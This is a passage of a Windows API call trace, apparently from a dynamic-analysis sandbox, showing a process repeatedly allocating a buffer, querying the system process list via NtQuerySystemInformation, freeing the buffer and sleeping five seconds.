BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.352] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.371] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.380] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.390] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.400] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.410] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.532] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.539] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.546] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.554] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.561] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.570] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.579] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.586] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.593] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.601] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.608] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.615] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.625] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.633] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.639] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.641] NtQuerySystemInformation (in: 